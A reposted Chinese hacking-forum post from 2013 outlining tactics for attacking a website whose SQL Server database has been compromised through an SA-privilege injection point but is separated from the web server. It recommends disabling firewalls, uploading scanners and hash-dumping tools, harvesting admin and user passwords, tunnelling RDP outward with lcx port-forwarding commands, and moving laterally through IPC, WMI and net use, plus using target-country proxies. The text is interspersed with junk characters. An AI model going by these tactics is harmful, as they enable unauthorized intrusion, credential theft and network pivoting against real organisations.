中国网络渗透测试联盟

标题: SA权限网站和数据库分离的一些思路 [打印本页]
作者: admin    时间: 2013-2-16 21:46
标题: SA权限网站和数据库分离的一些思路
当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。9 R& l+ Q, v( [+ g$ p- |

" n- L4 Z: E, h9 M3 Y/ ]1 `, h( `: F; s5 Q

6 ~9 r8 V6 W- cSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)7 B6 d' E6 e- T+ Q

5 c8 \1 @) W7 H2 q2 n* N
, S  @, |! I$ T一、DB机有公网IP.1 b5 v' {) ~# F6 t) a5 g; @

) |' s. g, m+ R  q- p" E, B1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
; ~5 V8 b  m+ z+ P0 K, _* s# G5 z* v' b# H0 B. x, c

. W6 D6 U4 N5 j# }5 C6 }6 V( e& j2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
; i# u& ]% X2 r; R* D0 z* p
6 B9 ^" ~4 A- G7 a$ D) G& h/ x" F
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com( v! K* g+ m9 Z
' |7 e" k1 h) u, e

* M1 h' C1 R- |9 ~4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.5 [) h# z& D; e: x5 G

, D% Z0 G+ S# d# B4 q$ D' f7 }4 D( ~0 U- v/ {1 |2 ?& f

- ~. V2 _7 w5 }. u' H& D二、DB机只有内网IP
. e: `1 ]# ?, T# b
/ \' s( T( D& b% Z2 i/ L1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
9 Y- F% c3 O6 Y: t! L$ y
6 h, ~* `+ M9 h0 k9 Y5 q' h% @& X4 x% h% [# s5 s9 P; J
2:停掉防火墙和IP策略再从内往外扫描.7 w, }/ \3 L" x1 k: u. x" @
0 G. L( w. o9 f; D5 k+ n
+ ~  C" ^' e) w4 h" K
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
( T# o" z9 k2 L. f3 z0 G: X8 C
4 Y! j9 X+ Q" l) e) L
+ @: G4 h' T0 J0 ?  f2 M4:学会密码规律分析往往会有惊喜.
! [: Q1 r' s1 h+ |
+ i* U- O1 r+ B; l6 I: n8 E; d" J% a5 {3 v1 c* V6 f- q
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等$ ^+ n- `  Q- }' o* d. z( m

9 F/ \/ ]/ P# o! T1 M3 l, C- Y5 `4 z, U$ y* k$ V
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的​



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2